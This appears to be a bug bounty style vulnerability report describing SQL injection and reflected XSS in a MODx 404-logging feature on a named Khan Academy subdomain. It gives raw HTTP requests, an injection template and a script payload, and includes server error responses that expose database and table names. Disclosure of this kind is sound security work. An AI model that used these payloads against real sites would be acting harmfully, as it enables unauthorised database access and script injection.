Sql injection And XSS

Hi , ##Sql lnjection to reproduce the issue make this request , just copy it to burp repeater and don't add any other headers . GET /Campin/jeatest' HTTP/1.1 Host: smarthistory.khanacademy.org Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close simple response : INSERT INTO `hzadofss_modx`.`error_404_logger` (url, ip, host, referer, createdon) VALUES ('/Campin/jeatest'','107.23.39.46', 'ec2-107-23-39-46.compute-1.amazonaws.com', '', '2014-10-11 07:51:13')</span></b> ##To confirm Sql the error is shown by MODx , the sql injection happens when a user request a page that doesnt exist then MODx log the request with some others details (ip,host..) . the following injection works /Campin/qsdqsd',(commands here),1,1,1)# i couldn't do more tests because there is a timeout (Error 503 Service Unavailable due to many requests , btw its really a slow server) Timeout in transmission from smarthistory.khanacademy.org ## XSS GET /Campin/jeatest'"><script>alert(4);</script> HTTP/1.1 Host: smarthistory.khanacademy.org Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close response ing to parse the requested resource:</td></tr> <tr><td colspan='3'><b style='color:red;'>&laquo; Execution of a query to the database failed - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"><script>alert(4);</script>','107.23.39.46', 'ec2-107-23-39-46.compute-1.amazon' at line 1 &raquo;</b></td></tr><tr><td colspan='3'><b style='color:#999;font-size: 9px;'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;SQL:&nbsp;<span id='sqlHolder'>INSERT INTO `hzadofss_modx`.`error_404_logger` (url, ip, host, referer, createdon) VALUES ('/Campin/jeatest'"><script>alert(4);</script>','107.23.39.46', 'ec2-107-23-39-46.compute-1.amazonaws.com', '', '2014-10-11 08:01:23')</span></b>